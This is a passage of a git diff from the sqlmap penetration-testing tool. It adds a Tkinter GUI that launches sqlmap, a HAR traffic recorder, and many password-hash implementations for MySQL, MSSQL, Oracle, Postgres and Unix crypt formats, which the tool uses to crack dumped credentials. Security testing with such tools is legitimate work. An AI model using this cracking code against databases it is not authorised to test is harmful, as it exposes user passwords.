SqlmapSystemException +from lib.core.settings import DEV_EMAIL_ADDRESS +from lib.core.settings import IS_WIN +from lib.core.settings import ISSUES_PAGE +from lib.core.settings import GIT_PAGE +from lib.core.settings import SITE +from lib.core.settings import VERSION_STRING +from lib.core.settings import WIKI_PAGE +from thirdparty.six.moves import queue as _queue + +alive = None +line = "" +process = None +queue = None + +def runGui(parser): + try: + from thirdparty.six.moves import tkinter as _tkinter + from thirdparty.six.moves import tkinter_scrolledtext as _tkinter_scrolledtext + from thirdparty.six.moves import tkinter_ttk as _tkinter_ttk + from thirdparty.six.moves import tkinter_messagebox as _tkinter_messagebox + except ImportError as ex: + raise SqlmapMissingDependence("missing dependence ('%s')" % getSafeExString(ex)) + + # Reference: https://www.reddit.com/r/learnpython/comments/985umy/limit_user_input_to_only_int_with_tkinter/e4dj9k9?utm_source=share&utm_medium=web2x + class ConstrainedEntry(_tkinter.Entry): + def __init__(self, master=None, **kwargs): + self.var = _tkinter.StringVar() + self.regex = kwargs["regex"] + del kwargs["regex"] + _tkinter.Entry.__init__(self, master, textvariable=self.var, **kwargs) + self.old_value = '' + self.var.trace('w', self.check) + self.get, self.set = self.var.get, self.var.set + + def check(self, *args): + if re.search(self.regex, self.get()): + self.old_value = self.get() + else: + self.set(self.old_value) + + try: + window = _tkinter.Tk() + except Exception as ex: + errMsg = "unable to create GUI window ('%s')" % getSafeExString(ex) + raise SqlmapSystemException(errMsg) + + window.title("sqlmap - Tkinter GUI") + + # Set theme and colors + bg_color = "#f5f5f5" + fg_color = "#333333" + accent_color = "#2c7fb8" + window.configure(background=bg_color) + + # Configure styles + style = _tkinter_ttk.Style() + + # Try to use a more modern theme if available + available_themes = style.theme_names() + if 'clam' in available_themes: + style.theme_use('clam') + elif 'alt' in available_themes: + style.theme_use('alt') + + # Configure notebook style + style.configure("TNotebook", background=bg_color) + style.configure("TNotebook.Tab", + padding=[10, 4], + background="#e1e1e1", + font=('Helvetica', 9)) + style.map("TNotebook.Tab", + background=[("selected", accent_color), ("active", "#7fcdbb")], + foreground=[("selected", "white"), ("active", "white")]) + + # Configure button style + style.configure("TButton", + padding=4, + relief="flat", + background=accent_color, + foreground="white", + font=('Helvetica', 9)) + style.map("TButton", + background=[('active', '#41b6c4')]) + + # Reference: https://stackoverflow.com/a/10018670 + def center(window): + window.update_idletasks() + width = window.winfo_width() + frm_width = window.winfo_rootx() - window.winfo_x() + win_width = width + 2 * frm_width + height = window.winfo_height() + titlebar_height = window.winfo_rooty() - window.winfo_y() + win_height = height + titlebar_height + frm_width + x = window.winfo_screenwidth() // 2 - win_width // 2 + y = window.winfo_screenheight() // 2 - win_height // 2 + window.geometry('{}x{}+{}+{}'.format(width, height, x, y)) + window.deiconify() + + def onKeyPress(event): + global line + global queue + + if process: + if event.char == '\b': + line = line[:-1] + else: + line += event.char + + def onReturnPress(event): + global line + global queue + + if process: + try: + process.stdin.write(("%s\n" % line.strip()).encode()) + process.stdin.flush() + except socket.error: + line 
= "" + event.widget.master.master.destroy() + return "break" + except: + return + + event.widget.insert(_tkinter.END, "\n") + + return "break" + + def run(): + global alive + global process + global queue + + config = {} + + for key in window._widgets: + dest, widget_type = key + widget = window._widgets[key] + + if hasattr(widget, "get") and not widget.get(): + value = None + elif widget_type == "string": + value = widget.get() + elif widget_type == "float": + value = float(widget.get()) + elif widget_type == "int": + value = int(widget.get()) + else: + value = bool(widget.var.get()) + + config[dest] = value + + for option in parser.option_list: + # Only set default if not already set by the user + if option.dest not in config or config[option.dest] is None: + config[option.dest] = defaults.get(option.dest, None) + + handle, configFile = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.CONFIG, text=True) + os.close(handle) + + saveConfig(config, configFile) + + def enqueue(stream, queue): + global alive + + for line in iter(stream.readline, b''): + queue.put(line) + + alive = False + stream.close() + + alive = True + + process = subprocess.Popen([sys.executable or "python", os.path.join(paths.SQLMAP_ROOT_PATH, "sqlmap.py"), "-c", configFile], shell=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, bufsize=1, close_fds=not IS_WIN) + + # Reference: https://stackoverflow.com/a/4896288 + queue = _queue.Queue() + thread = threading.Thread(target=enqueue, args=(process.stdout, queue)) + thread.daemon = True + thread.start() + + top = _tkinter.Toplevel() + top.title("Console") + top.configure(background=bg_color) + + # Create a frame for the console + console_frame = _tkinter.Frame(top, bg=bg_color) + console_frame.pack(fill=_tkinter.BOTH, expand=True, padx=10, pady=10) + + # Reference: https://stackoverflow.com/a/13833338 + text = _tkinter_scrolledtext.ScrolledText(console_frame, undo=True, wrap=_tkinter.WORD, + bg="#2c3e50", fg="#ecf0f1", + insertbackground="white", + font=('Consolas', 10)) + text.bind("<Key>", onKeyPress) + text.bind("<Return>", onReturnPress) + text.pack(fill=_tkinter.BOTH, expand=True) + text.focus() + + center(top) + + while True: + line = "" + try: + line = queue.get(timeout=.1) + text.insert(_tkinter.END, line) + except _queue.Empty: + text.see(_tkinter.END) + text.update_idletasks() + + if not alive: + break + + # Create a menu bar + menubar = _tkinter.Menu(window, bg=bg_color, fg=fg_color) + + filemenu = _tkinter.Menu(menubar, tearoff=0, bg=bg_color, fg=fg_color) + filemenu.add_command(label="Open", state=_tkinter.DISABLED) + filemenu.add_command(label="Save", state=_tkinter.DISABLED) + filemenu.add_separator() + filemenu.add_command(label="Exit", command=window.quit) + menubar.add_cascade(label="File", menu=filemenu) + + menubar.add_command(label="Run", command=run) + + helpmenu = _tkinter.Menu(menubar, tearoff=0, bg=bg_color, fg=fg_color) + helpmenu.add_command(label="Official site", command=lambda: webbrowser.open(SITE)) + helpmenu.add_command(label="Github pages", command=lambda: webbrowser.open(GIT_PAGE)) + helpmenu.add_command(label="Wiki pages", command=lambda: webbrowser.open(WIKI_PAGE)) + helpmenu.add_command(label="Report issue", command=lambda: webbrowser.open(ISSUES_PAGE)) + helpmenu.add_separator() + helpmenu.add_command(label="About", command=lambda: _tkinter_messagebox.showinfo("About", "%s\n\n (%s)" % (VERSION_STRING, DEV_EMAIL_ADDRESS))) + menubar.add_cascade(label="Help", menu=helpmenu) + + window.config(menu=menubar, bg=bg_color) 
+ window._widgets = {} + + # Create header frame + header_frame = _tkinter.Frame(window, bg=bg_color, height=60) + header_frame.pack(fill=_tkinter.X, pady=(0, 5)) + header_frame.pack_propagate(0) + + # Add header label + title_label = _tkinter.Label(header_frame, text="Configuration", + font=('Helvetica', 14), + fg=accent_color, bg=bg_color) + title_label.pack(side=_tkinter.LEFT, padx=15) + + # Add run button in header + run_button = _tkinter_ttk.Button(header_frame, text="Run", command=run, width=12) + run_button.pack(side=_tkinter.RIGHT, padx=15) + + # Create notebook + notebook = _tkinter_ttk.Notebook(window) + notebook.pack(expand=1, fill="both", padx=5, pady=(0, 5)) + + # Store tab information for background loading + tab_frames = {} + tab_canvases = {} + tab_scrollable_frames = {} + tab_groups = {} + + # Create empty tabs with scrollable areas first (fast) + for group in parser.option_groups: + # Create a frame with scrollbar for the tab + tab_frame = _tkinter.Frame(notebook, bg=bg_color) + tab_frames[group.title] = tab_frame + + # Create a canvas with scrollbar + canvas = _tkinter.Canvas(tab_frame, bg=bg_color, highlightthickness=0) + scrollbar = _tkinter_ttk.Scrollbar(tab_frame, orient="vertical", command=canvas.yview) + scrollable_frame = _tkinter.Frame(canvas, bg=bg_color) + + # Store references + tab_canvases[group.title] = canvas + tab_scrollable_frames[group.title] = scrollable_frame + tab_groups[group.title] = group + + # Configure the canvas scrolling + scrollable_frame.bind( + "<Configure>", + lambda e, canvas=canvas: canvas.configure(scrollregion=canvas.bbox("all")) + ) + + canvas.create_window((0, 0), window=scrollable_frame, anchor="nw") + canvas.configure(yscrollcommand=scrollbar.set) + + # Pack the canvas and scrollbar + canvas.pack(side="left", fill="both", expand=True) + scrollbar.pack(side="right", fill="y") + + # Add the tab to the notebook + notebook.add(tab_frame, text=group.title) + + # Add a loading indicator + loading_label = _tkinter.Label(scrollable_frame, text="Loading options...", + font=('Helvetica', 12), + fg=accent_color, bg=bg_color) + loading_label.pack(expand=True) + + # Function to populate a tab in the background + def populate_tab(tab_name): + group = tab_groups[tab_name] + scrollable_frame = tab_scrollable_frames[tab_name] + canvas = tab_canvases[tab_name] + + # Remove loading indicator + for child in scrollable_frame.winfo_children(): + child.destroy() + + # Add content to the scrollable frame + row = 0 + + if group.get_description(): + desc_label = _tkinter.Label(scrollable_frame, text=group.get_description(), + wraplength=600, justify="left", + font=('Helvetica', 9), + fg="#555555", bg=bg_color) + desc_label.grid(row=row, column=0, columnspan=3, sticky="w", padx=10, pady=(10, 5)) + row += 1 + + for option in group.option_list: + # Option label + option_label = _tkinter.Label(scrollable_frame, + text=parser.formatter._format_option_strings(option) + ":", + font=('Helvetica', 9), + fg=fg_color, bg=bg_color, + anchor="w") + option_label.grid(row=row, column=0, sticky="w", padx=10, pady=2) + + # Input widget + if option.type == "string": + widget = _tkinter.Entry(scrollable_frame, font=('Helvetica', 9), + relief="sunken", bd=1, width=20) + widget.grid(row=row, column=1, sticky="w", padx=5, pady=2) + elif option.type == "float": + widget = ConstrainedEntry(scrollable_frame, regex=r"\A\d*\.?\d*\Z", + font=('Helvetica', 9), + relief="sunken", bd=1, width=10) + widget.grid(row=row, column=1, sticky="w", padx=5, pady=2) + elif option.type == "int": + 
widget = ConstrainedEntry(scrollable_frame, regex=r"\A\d*\Z", + font=('Helvetica', 9), + relief="sunken", bd=1, width=10) + widget.grid(row=row, column=1, sticky="w", padx=5, pady=2) + else: + var = _tkinter.IntVar() + widget = _tkinter.Checkbutton(scrollable_frame, variable=var, + bg=bg_color, activebackground=bg_color) + widget.var = var + widget.grid(row=row, column=1, sticky="w", padx=5, pady=2) + + # Help text (truncated to improve performance) + help_text = option.help + if len(help_text) > 100: + help_text = help_text[:100] + "..." + + help_label = _tkinter.Label(scrollable_frame, text=help_text, + font=('Helvetica', 8), + fg="#666666", bg=bg_color, + wraplength=400, justify="left") + help_label.grid(row=row, column=2, sticky="w", padx=5, pady=2) + + # Store widget reference + window._widgets[(option.dest, option.type)] = widget + + # Set default value + default = defaults.get(option.dest) + if default: + if hasattr(widget, "insert"): + widget.insert(0, default) + elif hasattr(widget, "var"): + widget.var.set(1 if default else 0) + + row += 1 + + # Add some padding at the bottom + _tkinter.Label(scrollable_frame, bg=bg_color, height=1).grid(row=row, column=0) + + # Update the scroll region after adding all widgets + canvas.update_idletasks() + canvas.configure(scrollregion=canvas.bbox("all")) + + # Update the UI to show the tab is fully loaded + window.update_idletasks() + + # Function to populate tabs in the background + def populate_tabs_background(): + for tab_name in tab_groups.keys(): + # Schedule each tab to be populated with a small delay between them + window.after(100, lambda name=tab_name: populate_tab(name)) + + # Start populating tabs in the background after a short delay + window.after(500, populate_tabs_background) + + # Set minimum window size + window.update() + window.minsize(800, 500) + + # Center the window on screen + center(window) + + # Start the GUI + window.mainloop() diff --git a/lib/utils/har.py b/lib/utils/har.py new file mode 100644 index 00000000000..cb34bf39179 --- /dev/null +++ b/lib/utils/har.py @@ -0,0 +1,236 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import base64 +import datetime +import io +import re +import time + +from lib.core.bigarray import BigArray +from lib.core.convert import getBytes +from lib.core.convert import getText +from lib.core.settings import VERSION +from thirdparty.six.moves import BaseHTTPServer as _BaseHTTPServer +from thirdparty.six.moves import http_client as _http_client + +# Reference: https://dvcs.w3.org/hg/webperf/raw-file/tip/specs/HAR/Overview.html +# http://www.softwareishard.com/har/viewer/ + +class HTTPCollectorFactory(object): + def __init__(self, harFile=False): + self.harFile = harFile + + def create(self): + return HTTPCollector() + +class HTTPCollector(object): + def __init__(self): + self.messages = BigArray() + self.extendedArguments = {} + + def setExtendedArguments(self, arguments): + self.extendedArguments = arguments + + def collectRequest(self, requestMessage, responseMessage, startTime=None, endTime=None): + self.messages.append(RawPair(requestMessage, responseMessage, + startTime=startTime, endTime=endTime, + extendedArguments=self.extendedArguments)) + + def obtain(self): + return {"log": { + "version": "1.2", + "creator": {"name": "sqlmap", "version": VERSION}, + "entries": [pair.toEntry().toDict() for pair in self.messages], + }} + +class RawPair(object): + def __init__(self, request, 
response, startTime=None, endTime=None, extendedArguments=None): + self.request = getBytes(request) + self.response = getBytes(response) + self.startTime = startTime + self.endTime = endTime + self.extendedArguments = extendedArguments or {} + + def toEntry(self): + return Entry(request=Request.parse(self.request), response=Response.parse(self.response), + startTime=self.startTime, endTime=self.endTime, + extendedArguments=self.extendedArguments) + +class Entry(object): + def __init__(self, request, response, startTime, endTime, extendedArguments): + self.request = request + self.response = response + self.startTime = startTime or 0 + self.endTime = endTime or 0 + self.extendedArguments = extendedArguments + + def toDict(self): + out = { + "request": self.request.toDict(), + "response": self.response.toDict(), + "cache": {}, + "timings": { + "send": -1, + "wait": -1, + "receive": -1, + }, + "time": int(1000 * (self.endTime - self.startTime)), + "startedDateTime": "%s%s" % (datetime.datetime.fromtimestamp(self.startTime).isoformat(), time.strftime("%z")) if self.startTime else None + } + out.update(self.extendedArguments) + return out + +class Request(object): + def __init__(self, method, path, httpVersion, headers, postBody=None, raw=None, comment=None): + self.method = method + self.path = path + self.httpVersion = httpVersion + self.headers = headers or {} + self.postBody = postBody + self.comment = comment.strip() if comment else comment + self.raw = raw + + @classmethod + def parse(cls, raw): + request = HTTPRequest(raw) + return cls(method=request.command, + path=request.path, + httpVersion=request.request_version, + headers=request.headers, + postBody=request.rfile.read(), + comment=request.comment, + raw=raw) + + @property + def url(self): + host = self.headers.get("Host", "unknown") + return "http://%s%s" % (host, self.path) + + def toDict(self): + out = { + "httpVersion": self.httpVersion, + "method": self.method, + "url": self.url, + "headers": [dict(name=key.capitalize(), value=value) for key, value in self.headers.items()], + "cookies": [], + "queryString": [], + "headersSize": -1, + "bodySize": -1, + "comment": getText(self.comment), + } + + if self.postBody: + contentType = self.headers.get("Content-Type") + out["postData"] = { + "mimeType": contentType, + "text": getText(self.postBody).rstrip("\r\n"), + } + + return out + +class Response(object): + extract_status = re.compile(b'\\((\\d{3}) (.*)\\)') + + def __init__(self, httpVersion, status, statusText, headers, content, raw=None, comment=None): + self.raw = raw + self.httpVersion = httpVersion + self.status = status + self.statusText = statusText + self.headers = headers + self.content = content + self.comment = comment.strip() if comment else comment + + @classmethod + def parse(cls, raw): + altered = raw + comment = b"" + + if altered.startswith(b"HTTP response [") or altered.startswith(b"HTTP redirect ["): + stream = io.BytesIO(raw) + first_line = stream.readline() + parts = cls.extract_status.search(first_line) + status_line = "HTTP/1.0 %s %s" % (getText(parts.group(1)), getText(parts.group(2))) + remain = stream.read() + altered = getBytes(status_line) + b"\r\n" + remain + comment = first_line + + response = _http_client.HTTPResponse(FakeSocket(altered)) + response.begin() + + # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5942 + response.length = len(raw[raw.find(b"\r\n\r\n") + 4:]) + + try: + content = response.read() + except _http_client.IncompleteRead: + content = raw[raw.find(b"\r\n\r\n") + 
4:].rstrip(b"\r\n") + + return cls(httpVersion="HTTP/1.1" if response.version == 11 else "HTTP/1.0", + status=response.status, + statusText=response.reason, + headers=response.msg, + content=content, + comment=comment, + raw=raw) + + def toDict(self): + content = { + "mimeType": self.headers.get("Content-Type"), + "text": self.content, + "size": len(self.content or "") + } + + binary = set([b'\0', b'\1']) + if any(c in binary for c in self.content): + content["encoding"] = "base64" + content["text"] = getText(base64.b64encode(self.content)) + else: + content["text"] = getText(content["text"]) + + return { + "httpVersion": self.httpVersion, + "status": self.status, + "statusText": self.statusText, + "headers": [dict(name=key.capitalize(), value=value) for key, value in self.headers.items() if key.lower() != "uri"], + "cookies": [], + "content": content, + "headersSize": -1, + "bodySize": -1, + "redirectURL": "", + "comment": getText(self.comment), + } + +class FakeSocket(object): + # Original source: + # https://stackoverflow.com/questions/24728088/python-parse-http-response-string + + def __init__(self, response_text): + self._file = io.BytesIO(response_text) + + def makefile(self, *args, **kwargs): + return self._file + +class HTTPRequest(_BaseHTTPServer.BaseHTTPRequestHandler): + # Original source: + # https://stackoverflow.com/questions/4685217/parse-raw-http-headers + + def __init__(self, request_text): + self.comment = None + self.rfile = io.BytesIO(request_text) + self.raw_requestline = self.rfile.readline() + + if self.raw_requestline.startswith(b"HTTP request ["): + self.comment = self.raw_requestline + self.raw_requestline = self.rfile.readline() + + self.error_code = self.error_message = None + self.parse_request() + + def send_error(self, code, message): + self.error_code = code + self.error_message = message diff --git a/lib/utils/hash.py b/lib/utils/hash.py index 554cdd143e8..13a978149af 100644 --- a/lib/utils/hash.py +++ b/lib/utils/hash.py @@ -1,34 +1,42 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from __future__ import print_function + try: from crypt import crypt -except ImportError: +except: # removed ImportError because of https://github.com/sqlmapproject/sqlmap/issues/3171 from thirdparty.fcrypt.fcrypt import crypt -_multiprocessing = None try: - import multiprocessing + from Crypto.Cipher.DES import MODE_CBC as CBC + from Crypto.Cipher.DES import new as des +except: + from thirdparty.pydes.pyDes import CBC + from thirdparty.pydes.pyDes import des - # problems on FreeBSD (Reference: http://www.eggheadcafe.com/microsoft/Python/35880259/multiprocessing-on-freebsd.aspx) - _ = multiprocessing.Queue() -except (ImportError, OSError): - pass -else: - _multiprocessing = multiprocessing +_multiprocessing = None +import base64 +import binascii +import gc +import math import os import re import tempfile import time +import zipfile from hashlib import md5 from hashlib import sha1 -from Queue import Queue +from hashlib import sha224 +from hashlib import sha256 +from hashlib import sha384 +from hashlib import sha512 from lib.core.common import Backend from lib.core.common import checkFile @@ -36,47 +44,63 @@ from lib.core.common import dataToStdout from lib.core.common import getFileItems from lib.core.common import getPublicTypeMembers +from lib.core.common import 
getSafeExString from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite +from lib.core.common import isZipFile from lib.core.common import normalizeUnicode +from lib.core.common import openFile from lib.core.common import paths from lib.core.common import readInput from lib.core.common import singleTimeLogMessage from lib.core.common import singleTimeWarnMessage -from lib.core.convert import hexdecode -from lib.core.convert import hexencode -from lib.core.convert import utf8encode +from lib.core.compat import xrange +from lib.core.convert import decodeBase64 +from lib.core.convert import decodeHex +from lib.core.convert import encodeHex +from lib.core.convert import getBytes +from lib.core.convert import getText +from lib.core.convert import getUnicode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.datatype import OrderedSet +from lib.core.decorators import cachedmethod from lib.core.enums import DBMS from lib.core.enums import HASH -from lib.core.exception import SqlmapFilePathException +from lib.core.enums import MKSTEMP_PREFIX +from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapUserQuitException from lib.core.settings import COMMON_PASSWORD_SUFFIXES from lib.core.settings import COMMON_USER_COLUMNS +from lib.core.settings import DEV_EMAIL_ADDRESS from lib.core.settings import DUMMY_USER_PREFIX +from lib.core.settings import HASH_BINARY_COLUMNS_REGEX +from lib.core.settings import HASH_EMPTY_PASSWORD_MARKER from lib.core.settings import HASH_MOD_ITEM_DISPLAY from lib.core.settings import HASH_RECOGNITION_QUIT_THRESHOLD +from lib.core.settings import INVALID_UNICODE_CHAR_FORMAT from lib.core.settings import IS_WIN from lib.core.settings import ITOA64 -from lib.core.settings import ML from lib.core.settings import NULL -from lib.core.settings import UNICODE_ENCODING from lib.core.settings import ROTATING_CHARS +from lib.core.settings import UNICODE_ENCODING from lib.core.wordlist import Wordlist -from thirdparty.pydes.pyDes import des -from thirdparty.pydes.pyDes import CBC +from thirdparty import six +from thirdparty.colorama.initialise import init as coloramainit +from thirdparty.six.moves import queue as _queue def mysql_passwd(password, uppercase=True): """ Reference(s): - http://csl.sublevel3.org/mysql-password-function/ + https://web.archive.org/web/20120215205312/http://csl.sublevel3.org/mysql-password-function/ >>> mysql_passwd(password='testpass', uppercase=True) '*00E247AC5F9AF26AE0194B41E1E769DEE1429A29' """ + password = getBytes(password) + retVal = "*%s" % sha1(sha1(password).digest()).hexdigest() return retVal.upper() if uppercase else retVal.lower() @@ -84,8 +108,8 @@ def mysql_passwd(password, uppercase=True): def mysql_old_passwd(password, uppercase=True): # prior to version '4.1' """ Reference(s): - http://www.sfr-fresh.com/unix/privat/tpop3d-1.5.5.tar.gz:a/tpop3d-1.5.5/password.c - http://voidnetwork.org/5ynL0rd/darkc0de/python_script/darkMySQLi.html + https://web.archive.org/web/20091205000600/http://www.sfr-fresh.com/unix/privat/tpop3d-1.5.5.tar.gz:a/tpop3d-1.5.5/password.c + https://github.com/pwnieexpress/pwn_plug_sources/blob/master/src/darkmysqli/DarkMySQLi.py >>> mysql_old_passwd(password='testpass', uppercase=True) '7DCDA0D57290B453' @@ -115,11 +139,31 @@ def postgres_passwd(password, username, uppercase=False): 'md599e5ea7a6f7c3269995cba3927fd0093' """ + username = getBytes(username) + password = getBytes(password) + retVal = "md5%s" % 
md5(password + username).hexdigest() return retVal.upper() if uppercase else retVal.lower() -def mssql_passwd(password, salt, uppercase=False): +def mssql_new_passwd(password, salt, uppercase=False): # since version '2012' + """ + Reference(s): + http://hashcat.net/forum/thread-1474.html + https://sqlity.net/en/2460/sql-password-hash/ + + >>> mssql_new_passwd(password='testpass', salt='4086ceb6', uppercase=False) + '0x02004086ceb6eb051cdbc5bdae68ffc66c918d4977e592f6bdfc2b444a7214f71fa31c35902c5b7ae773ed5f4c50676d329120ace32ee6bc81c24f70711eb0fc6400e85ebf25' + """ + + binsalt = decodeHex(salt) + unistr = b"".join((_.encode(UNICODE_ENCODING) + b"\0") if ord(_) < 256 else _.encode(UNICODE_ENCODING) for _ in password) + + retVal = "0200%s%s" % (salt, sha512(unistr + binsalt).hexdigest()) + + return "0x%s" % (retVal.upper() if uppercase else retVal.lower()) + +def mssql_passwd(password, salt, uppercase=False): # versions '2005' and '2008' """ Reference(s): http://www.leidecker.info/projects/phrasendrescher/mssql.c @@ -129,14 +173,14 @@ def mssql_passwd(password, salt, uppercase=False): '0x01004086ceb60c90646a8ab9889fe3ed8e5c150b5460ece8425a' """ - binsalt = hexdecode(salt) - unistr = "".join(map(lambda c: ("%s\0" if ord(c) < 256 else "%s") % utf8encode(c), password)) + binsalt = decodeHex(salt) + unistr = b"".join((_.encode(UNICODE_ENCODING) + b"\0") if ord(_) < 256 else _.encode(UNICODE_ENCODING) for _ in password) retVal = "0100%s%s" % (salt, sha1(unistr + binsalt).hexdigest()) return "0x%s" % (retVal.upper() if uppercase else retVal.lower()) -def mssql_old_passwd(password, salt, uppercase=True): # prior to version '2005' +def mssql_old_passwd(password, salt, uppercase=True): # version '2000' and before """ Reference(s): www.exploit-db.com/download_pdf/15537/ @@ -147,8 +191,8 @@ def mssql_old_passwd(password, salt, uppercase=True): # prior to version '2005' '0x01004086CEB60C90646A8AB9889FE3ED8E5C150B5460ECE8425AC7BB7255C0C81D79AA5D0E93D4BB077FB9A51DA0' """ - binsalt = hexdecode(salt) - unistr = "".join(map(lambda c: ("%s\0" if ord(c) < 256 else "%s") % utf8encode(c), password)) + binsalt = decodeHex(salt) + unistr = b"".join((_.encode(UNICODE_ENCODING) + b"\0") if ord(_) < 256 else _.encode(UNICODE_ENCODING) for _ in password) retVal = "0100%s%s%s" % (salt, sha1(unistr + binsalt).hexdigest(), sha1(unistr.upper() + binsalt).hexdigest()) @@ -165,9 +209,10 @@ def oracle_passwd(password, salt, uppercase=True): 'S:2BFCFDF5895014EE9BB2B9BA067B01E0389BB5711B7B5F82B7235E9E182C' """ - binsalt = hexdecode(salt) + binsalt = decodeHex(salt) + password = getBytes(password) - retVal = "s:%s%s" % (sha1(utf8encode(password) + binsalt).hexdigest(), salt) + retVal = "s:%s%s" % (sha1(password + binsalt).hexdigest(), salt) return retVal.upper() if uppercase else retVal.lower() @@ -180,19 +225,23 @@ def oracle_old_passwd(password, username, uppercase=True): # prior to version ' 'F894844C34402B67' """ - IV, pad = "\0" * 8, "\0" + IV, pad = b"\0" * 8, b"\0" - if isinstance(username, unicode): - username = unicode.encode(username, UNICODE_ENCODING) # pyDes has issues with unicode strings + unistr = b"".join((b"\0" + _.encode(UNICODE_ENCODING)) if ord(_) < 256 else _.encode(UNICODE_ENCODING) for _ in (username + password).upper()) - unistr = "".join("\0%s" % c for c in (username + password).upper()) + if des.__module__ == "Crypto.Cipher.DES": + unistr += b"\0" * ((8 - len(unistr) % 8) & 7) + cipher = des(decodeHex("0123456789ABCDEF"), CBC, iv=IV) + encrypted = cipher.encrypt(unistr) + cipher = des(encrypted[-8:], 
CBC, iv=IV) + encrypted = cipher.encrypt(unistr) + else: + cipher = des(decodeHex("0123456789ABCDEF"), CBC, IV, pad) + encrypted = cipher.encrypt(unistr) + cipher = des(encrypted[-8:], CBC, IV, pad) + encrypted = cipher.encrypt(unistr) - cipher = des(hexdecode("0123456789ABCDEF"), CBC, IV, pad) - encrypted = cipher.encrypt(unistr) - cipher = des(encrypted[-8:], CBC, IV, pad) - encrypted = cipher.encrypt(unistr) - - retVal = hexencode(encrypted[-8:]) + retVal = encodeHex(encrypted[-8:], binary=False) return retVal.upper() if uppercase else retVal.lower() @@ -202,6 +251,8 @@ def md5_generic_passwd(password, uppercase=False): '179ad45c6ce2cb97cf1029e212046e81' """ + password = getBytes(password) + retVal = md5(password).hexdigest() return retVal.upper() if uppercase else retVal.lower() @@ -212,12 +263,96 @@ def sha1_generic_passwd(password, uppercase=False): '206c80413b9a96c1312cc346b7d2517b84463edd' """ + password = getBytes(password) + retVal = sha1(password).hexdigest() return retVal.upper() if uppercase else retVal.lower() +def apache_sha1_passwd(password, **kwargs): + """ + >>> apache_sha1_passwd(password='testpass') + '{SHA}IGyAQTualsExLMNGt9JRe4RGPt0=' + """ + + password = getBytes(password) + + return "{SHA}%s" % getText(base64.b64encode(sha1(password).digest())) + +def ssha_passwd(password, salt, **kwargs): + """ + >>> ssha_passwd(password='testpass', salt='salt') + '{SSHA}mU1HPTvnmoXOhE4ROHP6sWfbfoRzYWx0' + """ + + password = getBytes(password) + salt = getBytes(salt) + + return "{SSHA}%s" % getText(base64.b64encode(sha1(password + salt).digest() + salt)) + +def ssha256_passwd(password, salt, **kwargs): + """ + >>> ssha256_passwd(password='testpass', salt='salt') + '{SSHA256}hhubsLrO/Aje9F/kJrgv5ZLE40UmTrVWvI7Dt6InP99zYWx0' + """ + + password = getBytes(password) + salt = getBytes(salt) + + return "{SSHA256}%s" % getText(base64.b64encode(sha256(password + salt).digest() + salt)) + +def ssha512_passwd(password, salt, **kwargs): + """ + >>> ssha512_passwd(password='testpass', salt='salt') + '{SSHA512}mCUSLfPMhXCQOJl9WHW/QMn9v9sjq7Ht/Wk7iVau8vLOfh+PeynkGMikqIE8sStFd0khdfcCD8xZmC6UyjTxsHNhbHQ=' + """ + + password = getBytes(password) + salt = getBytes(salt) + + return "{SSHA512}%s" % getText(base64.b64encode(sha512(password + salt).digest() + salt)) + +def sha224_generic_passwd(password, uppercase=False): + """ + >>> sha224_generic_passwd(password='testpass', uppercase=False) + '648db6019764b598f75ab6b7616d2e82563a00eb1531680e19ac4c6f' + """ + + retVal = sha224(getBytes(password)).hexdigest() + + return retVal.upper() if uppercase else retVal.lower() + +def sha256_generic_passwd(password, uppercase=False): + """ + >>> sha256_generic_passwd(password='testpass', uppercase=False) + '13d249f2cb4127b40cfa757866850278793f814ded3c587fe5889e889a7a9f6c' + """ + + retVal = sha256(getBytes(password)).hexdigest() + + return retVal.upper() if uppercase else retVal.lower() + +def sha384_generic_passwd(password, uppercase=False): + """ + >>> sha384_generic_passwd(password='testpass', uppercase=False) + '6823546e56adf46849343be991d4b1be9b432e42ed1b4bb90635a0e4b930e49b9ca007bc3e04bf0a4e0df6f1f82769bf' + """ + + retVal = sha384(getBytes(password)).hexdigest() + + return retVal.upper() if uppercase else retVal.lower() + +def sha512_generic_passwd(password, uppercase=False): + """ + >>> sha512_generic_passwd(password='testpass', uppercase=False) + '78ddc8555bb1677ff5af75ba5fc02cb30bb592b0610277ae15055e189b77fe3fda496e5027a3d99ec85d54941adee1cc174b50438fdc21d82d0a79f85b58cf44' + """ + + retVal = 
sha512(getBytes(password)).hexdigest() + + return retVal.upper() if uppercase else retVal.lower() -def crypt_generic_passwd(password, salt, uppercase=False): +def crypt_generic_passwd(password, salt, **kwargs): """ Reference(s): http://docs.python.org/library/crypt.html @@ -229,18 +364,145 @@ def crypt_generic_passwd(password, salt, uppercase=False): 'rl.3StKT.4T8M' """ - retVal = crypt(password, salt) + return getText(crypt(password, salt)) - return retVal.upper() if uppercase else retVal +def unix_md5_passwd(password, salt, magic="$1$", **kwargs): + """ + Reference(s): + http://www.sabren.net/code/python/crypt/md5crypt.py -def wordpress_passwd(password, salt, count, prefix, uppercase=False): + >>> unix_md5_passwd(password='testpass', salt='aD9ZLmkp') + '$1$aD9ZLmkp$DRM5a7rRZGyuuOPOjTEk61' + """ + + def _encode64(value, count): + output = "" + + while (count - 1 >= 0): + count = count - 1 + output += ITOA64[value & 0x3f] + value = value >> 6 + + return output + + password = getBytes(password) + magic = getBytes(magic) + salt = getBytes(salt) + + salt = salt[:8] + ctx = password + magic + salt + final = md5(password + salt + password).digest() + + for pl in xrange(len(password), 0, -16): + if pl > 16: + ctx = ctx + final[:16] + else: + ctx = ctx + final[:pl] + + i = len(password) + while i: + if i & 1: + ctx = ctx + b'\x00' # if ($i & 1) { $ctx->add(pack("C", 0)); } + else: + ctx = ctx + password[0:1] + i = i >> 1 + + final = md5(ctx).digest() + + for i in xrange(1000): + ctx1 = b"" + + if i & 1: + ctx1 = ctx1 + password + else: + ctx1 = ctx1 + final[:16] + + if i % 3: + 